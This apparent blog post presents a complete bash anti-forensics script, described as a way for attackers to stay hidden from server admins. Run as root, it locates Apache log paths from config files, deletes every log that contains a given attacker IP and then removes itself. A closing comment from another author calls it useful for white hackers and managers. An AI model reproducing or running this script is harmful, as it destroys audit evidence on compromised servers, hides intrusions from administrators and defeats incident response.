31 Jan
Hidden Attack with clear log files in Unix , linux
Hey ! I’m back some exams of university :D and ….
Here is bash script for finding path of log files (Apache first and soon : all Logs) and deleting them for some attackers to be hidden from server admins !.Not bad ? Not good ? Where u use that !?.
At first we find path of directory contain some wanted logs and then searching line by line for log paths,finally founding attacker Ip in log files and removing log file. Be happy !
TEsTed On Debian etch4.0 and FreeBSD 6*
This is Rc 1. [download] : Log_f
and here is source code in bash :
#!/usr/local/bin/bash ### coded by t4z3v4r3d ### recurse function : i m not sure who has write that .So thanks unknown man ### made for FreeBSD First .... if [ "`id -u`" != "0" ];then echo "$0 cant run as $USER Please Give me the root perms!!!!! " exit 1 fi patern=$2 fl=/tmp/f.txt fd=/tmp/find.txt length=/tmp/l-f.txt log_f=/tmp/log_f.txt log_final=/tmp/final_log.txt null=/dev/null log_path=/tmp/log_Found_.txt tm="`date | cut -d ":" -f 1`" os=$OSTYPE # you can add all paths for all os type !M$ windows IS NOT OS ....Exactly! case $os in Linux*) path=/etc/ ;; linux*) path=/etc/ ;; freebsd*) path=/usr/local/ ;; *) path=/ ;; esac rm $fl touch $fl rm $fd touch $fd rm $log_f touch $log_f rm $log_final touch $log_final rm $log_path touch $log_path clear echo "Enter attacker IP" read -e ip if [ "`find $path -name apache >> $fl`" ];then echo -e "\033[3;2f Main path Found ....\033[0;0m" else if [ "`find $path -name apache2 >> $fl`" ];then echo "Founded Apache2 Config files" fi fi recurse () { for file in $(/bin/ls $1) do fqfn=$1/$file [[ -d $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } [[ -f $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } ######################################################### if [ -f $1 ];then let "f=f+1" if [ "`ls $1 | grep -F .conf`" ];then let "t=t+1" cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`" echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt let "nt=nt+${nom[$t]}" let "j=$nt+$t" fi fi ################################################################################ ### MOnitoring all acts ################################################################################ echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m" echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" ############################################################################## done ; } reader(){ cat $fl | while read line ;do if [ "`ls $line | grep .conf`" != "" ];then recurse $line fi let "l=l+1" done } reader log_path_reader(){ cat $log_path | while read line ;do if [ -f $line ];then if [ "`cat $line | grep "$ip"`" != "" ];then echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in " echo -n "Removing $line" rm $line if [ ! -f $line ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi fi else echo -e "\033[1;30mFile [\033[1;31m"$line "\033[1;39mFile Dose not exist......\033[1;30m]" fi let "l2=l2+1" done } echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m" echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m" log_path_reader echo -en "\033[1;30mRemoving $0 " rm $fl $log_path $0 if [ ! -f $0 ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m" |
—————————————————
daphne :
Hi readers .
Thanks from mr.Amiri .
when we’re talking about the secret or hidden in server , Log files in unix , linux server , recorded everything . this script is usefull for [white hacker ] and manager to clear major log files .